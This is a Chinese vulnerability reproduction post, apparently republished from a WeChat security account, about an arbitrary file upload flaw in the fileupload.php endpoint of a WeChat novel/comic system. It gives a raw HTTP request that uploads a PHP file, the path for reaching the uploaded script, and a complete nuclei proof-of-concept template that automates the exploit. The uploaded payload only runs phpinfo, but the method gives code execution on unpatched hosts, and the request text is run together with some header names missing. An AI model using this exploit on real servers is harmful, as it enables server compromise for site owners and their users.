免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
微信公众号小说漫画系统,版本不详 。
03
—
漏洞描述
微信公众号小说漫画系统内置了丰富的小说和漫画资源,涵盖各类题材和风格,满足不同用户的阅读需求。同时,它还支持作者入驻和作品上传。能够支持多终端访问,如微信小程序、H5网页、微信公众号以及原生APP等。该系统fileupload.php接口处存在任意文件上传漏洞,请及时修复,否则会导致主机失陷。
04
—
"/Public/home/mhjs/jquery.js"
05
—
漏洞复现
向靶场发送如下数据包
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1Host: X.X.X.XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 221Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryqvlfcogulumndzorAccept-Encoding: gzip------WebKitFormBoundaryqvlfcogulumndzorContent-Disposition: form-data; name="file"; filename="fpgemjsu.php"Content-Type: image/jpegphpinfo();unlink(__FILE__);------WebKitFormBoundaryqvlfcogulumndzor
响应内容如下
HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedCache-Control: no-store, no-cache, must-revalidateCache-Control: post-check=0, pre-check=0Content-Type: text/html; charset=UTF-8Date: Thu, 10 Oct 2024 12:42:56 GMTExpires: Mon, 26 Jul 1997 05:00:00 GMTLast-Modified: Thu, 10 Oct 2024 12:42:56 GMTPragma: no-cacheServer: nginxVary: Accept-Encoding{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
2.访问回显文件
Public/webuploader/0.1.5/server/upload/fpgemjsu.php
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: WeChatOfficialAccountNovelComic-fileuploadinfo:name: 微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞author: fgzseverity: criticaldescription: 微信公众号小说漫画系统内置了丰富的小说和漫画资源,涵盖各类题材和风格,满足不同用户的阅读需求。同时,它还支持作者入驻和作品上传。能够支持多终端访问,如微信小程序、H5网页、微信公众号以及原生APP等。该系统fileupload.php接口处存在任意文件上传漏洞,请及时修复,否则会导致主机失陷。metadata:: 1: "/Public/home/mhjs/jquery.js"verified: truevariables:file_name: "{{to_lower(rand_text_alpha(8))}}"file_content: "{{to_lower(rand_text_alpha(20))}}"rboundary: "{{to_lower(rand_text_alpha(16))}}"requests:raw:|+POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Connection: close: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}------WebKitFormBoundary{{rboundary}}: form-data; name="file"; filename="{{file_name}}.php": image/jpegphpinfo();unlink(__FILE__);?>------WebKitFormBoundary{{rboundary}}|GET /Public/webuploader/0.1.5/server/upload/{{file_name}}.php HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: gzipextractors:type: jsonpart: bodyname: pathjson:'.name'internal: truematchers:type: dsldsl:"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, 'PHP Version') && contains(body_2, 'PHP API')"
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论